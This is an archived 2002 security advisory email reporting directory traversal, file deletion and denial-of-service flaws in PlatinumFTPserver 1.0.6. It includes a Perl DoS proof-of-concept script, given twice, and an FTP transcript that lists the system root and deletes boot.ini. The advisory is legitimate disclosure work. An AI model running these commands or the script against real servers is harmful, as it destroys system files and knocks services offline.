Date: Mon, 30 Dec 2002 20:34:40 +0100
From: Dennis Rand <[email protected]>
To: "[email protected]" <[email protected]>
Subject: Multiple vulnerabilities found in PlatinumFTPserver V1.0.6
------_=_NextPart_000_01C2B03A.7EC051C0
Content-Type: text/plain
Mvh.
Dennis Rand
System/Security Manager
COWI A/S
A world of machines pushing packets to each other. Computers passing data
through various protocols without argument. A problem humanity still hasn't
surpassed. Networks breaking barriers of political hatred. Physical bodies
are no longer important nor needed. A new world of electronic entities...
------_=_NextPart_000_01C2B03A.7EC051C0
Content-Type: application/octet-stream;
name="DoSftp.pl"
Content-Disposition: attachment;
filename="DoSftp.pl"
#!/usr/bin/perl
#
# PlatinumFTPserver V1.0.6
# http://www.PlatinumFTP.com
# Dennis Rand - [email protected]
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
#
#
use Net::FTP;
$target = shift() || die "usage: target ip";
my $user = "anonymous";
my $pass = "crash\@burn.com";
system('cls');
print "PlatinumFTPserver V1.0.6 DoS attack\n";
print "Trying to connect to target system at: $target...\n";
$ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die "could not connect: $!";
$ftp->login($user, $pass) || die "could not login: $!";
$ftp->cwd("/");
print "Trying to crash the FTP service...\n";
$ftp->cwd("cd @/..@/..");
$ftp->quit;
------_=_NextPart_000_01C2B03A.7EC051C0
Content-Type: text/plain;
name="advisory.txt"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="advisory.txt"
Multiple vulnerabilities found in=20
PlatinumFTPserver V1.0.6
PlatinumFTPserver (C)2002 BYTE/400 LTD
=20
Discovered by Dennis Rand - COWI A/S
------------------------------------------------------------------------=
SUMMARY
PlatinumFTPserver simplifies management of all your Ftp clients with =
regards=20
to sending and receiving program and data files over an IP connection.=20
Working within a control screen, PlatinumFTPserver gives you total=20
control: you can create and manage users, user groups and root =
directories.=20
You can define what Ftp Commands the users or groups can access.=20
PlatinumFTPserver provides activity logs, client connection details, =
file=20
and megabyte graphical statistics by session and day, virtual folders =
and a=20
built in Web Browser. The server engine runs as an application on =
Windows 9x=20
and a service under NT/2K/XP.
PlatinumFTPserver can bind to one or all IP addresses within the PC. =
All=20
configuration data for the server including password and description =
fields=20
are encrypted using the powerful Blowfish cipher. Clients can request =
files=20
be zipped before transfer, execute scripts created with the VBscript =
editor=20
and also access the shell process.
A vulnerability in the product allows remote attackers to cause=20
the server to traverse into directories that reside outside the =
bounding=20
FTP root directory, delete files and preform a DoS attack on the =
server.
DETAILS
Vulnerable systems:
* PlatinumFTPServer version 1.0.6
Also with installed patch released 14. dec. 2002
Immune systems:
* PlatinumFTPServer version 1.x.x
PlatinumFTP failure to filter out "..\" sequences in command requests =
allows=20
remote users to break out of restricted directories and gain read =
access=20
to the system directory structure; Possibility for deleting files and =
preforming
a DoS attack on the server.
The following transcript demonstrates a sample exploitation of the=20
vulnerabilities:
C:\>ftp 192.168.1.199
Connected to 192.168.1.199.
220-PlatinumFTPserver V1.0.6
220-PlatinumFTPserver (C)2002 BYTE/400 LTD
220-
220 Enter login details
User (192.168.1.199:(none)): anonymous
331 Password required for anonymous.
Password:
230-Send comments to [email protected]
230-Date 12/30/02, Time 1:44:34 PM.
230 Storage available 1,954,179,072 Bytes.
ftp> dir
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
226 Listing complete.
ftp> cd ..
550 Access denied
ftp> dir ..\..\..\..\
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 AUTOEXEC.BAT
-rwxr-xr-x 1 User Group 279 Dec 23 12:16 boot.ini
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 CONFIG.SYS
drwxr-xr-x 1 User Group 0 Dec 23 12:25 I386
drwxr-xr-x 1 User Group 0 Dec 23 22:22 Inetpub
drwxr-xr-x 1 User Group 0 Dec 23 21:49 =
Installationsfiler til Windows Update
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 IO.SYS
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 MSDOS.SYS
drwxr-xr-x 1 User Group 0 Dec 23 21:25 Multimedia =
Files
-rwxr-xr-x 1 User Group 26816 Dec 23 22:30 NTDETECT.COM
-rwxr-xr-x 1 User Group 156496 Dec 23 22:30 ntldr
drwxr-xr-x 1 User Group 0 Dec 23 12:36 OptionPack
-rwxr-xr-x 1 User Group 134217728 Dec 30 13:43 pagefile.sys
drwxr-xr-x 1 User Group 0 Dec 30 13:23 Program Files
drwxr-xr-x 1 User Group 0 Dec 23 12:24 RECYCLER
drwxr-xr-x 1 User Group 0 Dec 30 13:08 TEMP
drwxr-xr-x 1 User Group 0 Dec 30 13:55 WINNT
226 Listing complete.
ftp: 1181 bytes received in 0,00Seconds 1181000,00Kbytes/sec.
ftp> delete ..\..\..\..\boot.ini
250 delete command successful.
ftp> dir ..\..\..\..\
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 AUTOEXEC.BAT
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 CONFIG.SYS
drwxr-xr-x 1 User Group 0 Dec 23 12:25 I386
drwxr-xr-x 1 User Group 0 Dec 23 22:22 Inetpub
drwxr-xr-x 1 User Group 0 Dec 23 21:49 =
Installationsfiler til Windows Update
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 IO.SYS
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 MSDOS.SYS
drwxr-xr-x 1 User Group 0 Dec 23 21:25 Multimedia =
Files
-rwxr-xr-x 1 User Group 26816 Dec 23 22:30 NTDETECT.COM
-rwxr-xr-x 1 User Group 156496 Dec 23 22:30 ntldr
drwxr-xr-x 1 User Group 0 Dec 23 12:36 OptionPack
-rwxr-xr-x 1 User Group 134217728 Dec 30 15:24 pagefile.sys
drwxr-xr-x 1 User Group 0 Dec 30 15:19 Program Files
drwxr-xr-x 1 User Group 0 Dec 23 12:24 RECYCLER
drwxr-xr-x 1 User Group 0 Dec 24 00:08 TEMP
drwxr-xr-x 1 User Group 0 Dec 30 16:30 WINNT
226 Listing complete.
ftp: 1181 bytes received in 0,12Seconds 9,76Kbytes/sec.
ftp> cd @/..@/.. =20
ftp> bye
221 Goodbye.
Analysis:
1: DIR Command vulnerability
Any remote user with legitimate or anonymous access to an affected =
Platinum's
FTP server can exploit the vulnerability and freely browse the target=20
system's directory structure. Such information could prove useful in=20
subsequent attacks as well as provide information useful for an =
attacker=20
to successfully conduct social engineering attacks.=20
2: DELETE Command vulnerability
With this command it is possible to the attacker to destroy data on the =
server.
as you can see in the exploiting part it is fairly simple to do so.
3: CD Command vulnerability
The last command "cd @/..@/.." will cause a DoS attack on the server =
where=20
the server will use 99% og the CPU time.
Exploit code:
------------------------------------- CUT HERE =
-----------------------------------------
#!/usr/bin/perl
#
# PlatinumFTPserver V1.0.6 DoS attack
# http://www.PlatinumFTP.com
# Dennis Rand - [email protected]
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
#=20
#
use Net::FTP;
=20
$target =3D shift() || die "usage: target ip";
my $user =3D "anonymous";
my $pass =3D "crash\@burn.com";
system('cls');
print "PlatinumFTPserver V1.0.6 DoS attack\n";
print "Trying to connect to target system at: $target...\n";
$ftp =3D Net::FTP->new($target, Debug =3D> 0, Port =3D> 21) || die =
"could not connect: $!";
$ftp->login($user, $pass) || die "could not login: $!";
$ftp->cwd("/");
print "Trying to crash the FTP service...\n";
$ftp->cwd("cd @/..@/..");
$ftp->quit;
------------------------------------- CUT HERE =
-----------------------------------------
Detection:
PlatinumFTPServer version 1.0.6 is vulnerable to the above-described =
attacks.=20
Earlier versions may be susceptible as well. To determine if a specific =
implementation is vulnerable, experiment by following the above=20
transcript.=20
Vendor response:
PlatinumFTPServer version 1.x.x fixes this issue. The latest version is =
available from http://www.platinumftp.com/platinumftpserver.php
Disclosure timeline:
12/30/2002 Found the Vulnerability.
12/30/2002 Author notified ([email protected])
xx/xx/2002 Responses received from [email protected]=20
xx/xx/2002 Public Disclosure.
ADDITIONAL INFORMATION
The vulnerability was discovered by <mailto:[email protected]> Dennis Rand
------_=_NextPart_000_01C2B03A.7EC051C0--
